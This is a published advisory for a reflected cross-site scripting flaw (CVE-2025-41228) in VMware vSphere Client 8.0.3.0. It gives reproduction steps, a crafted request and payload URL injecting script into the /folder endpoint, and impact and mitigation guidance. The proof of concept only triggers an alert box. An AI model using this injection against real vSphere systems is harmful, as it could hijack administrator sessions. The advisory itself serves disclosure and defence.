CVE-2025-41228 - VMware vSphere Client 8.0.3.0 XSS
VULNERABILITY INFO
| CATEGORY | Vulnerabilities |
| PUBLISHED | August 11, 2025 |
| AUTHOR | Imraan Khan (Lich-Sec) |
| READ TIME | 2 MIN |
TAGS
Reflected XSS in VMware vSphere Client 8.0.3.0 via unsanitized query string on /folder endpoint.
Vulnerability Overview
A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the /folder endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s action attribute.
Attack Vector: Network (web interface)
Attack Complexity: Low
Privileges Required: Valid authenticated session required to trigger in-browser execution
User Interaction: None (when attacker can induce a victim to visit the crafted URL)
CVE: CVE-2025-41228
Description
The vulnerable endpoint reflects query string input directly into a form action attribute without proper encoding. An attacker who can obtain or coerce an authenticated administrator into opening a crafted URL can achieve arbitrary script execution in the admin's browser context.
Steps to Reproduce
- Initiate a benign request:
https://host/folder?ht7j4
- Intercept and modify the request using a proxy (e.g., Burp Suite). Inject payload into the query string:
GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
- Forward the request. Inspect the HTTP response. The payload appears unencoded inside an HTML form:
<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
<input name="VMware-CSRF-Token" type="hidden" value="..." />
- To observe execution, replay the exact malicious request in a browser with an active authenticated session (cookies present) or use Burp's "Open in Browser" with session cookies.
Example payload URL:
https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1
Impact
Arbitrary JavaScript execution within the vSphere Client web interface. Possible consequences:
- Session hijacking
- Administrative actions via CSRF
- Credential theft or phishing within the admin context
- Further pivoting inside management workflows
Recommendation
Upgrade to VMware vCenter Server 8.0 U3e or later which addresses CVE-2025-41228. If immediate upgrade is not possible:
- Restrict access to management interfaces to trusted networks and IP ranges.
- Require VPN or jump-host access for administrative consoles.
- Apply Content Security Policy (CSP) and additional web-layer controls where feasible.
- Monitor administrative sessions and anomalous requests to
/folder.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41228
- VMware Security Advisories: https://www.vmware.com/security/advisories
Credits
Discovered / PoC Author: Imraan Khan (Lich-Sec)
EDB ID: 52406
CVE: CVE-2025-41228
⚠️ DISCLAIMER: This document reproduces public exploit disclosure material for defensive and research use. Test only on systems you own or are authorized to test. Unauthorized exploitation is illegal.
RELATED VULNERABILITIES
CVE-2023-44487 - HTTP/2 Rapid Reset Denial of Service
A remote unauthenticated attacker can exploit the HTTP/2 Rapid Reset vulnerability to perform a high-impact denial-of-service attack by rapidly opening and resetting streams, exhausting server resources.
CVE-2023-43320 Proxmox VE - TOTP Brute Force
Defensive advisory and mitigation guidance for reported Proxmox VE TOTP brute-force activity. PoC code omitted for safety.
CVE-2023-6553 - WordPress Backup Migration Plugin Remote Code Execution
Unauthenticated remote code execution in WordPress Backup Migration plugin (≤1.3.7) via PHP filter chain injection through Content-Dir header manipulation. Critical web application vulnerability enabling complete server compromise.
Need Professional Security Audit?
Penetration testing, security assessment and vulnerability research services from our expert team
CONTACT US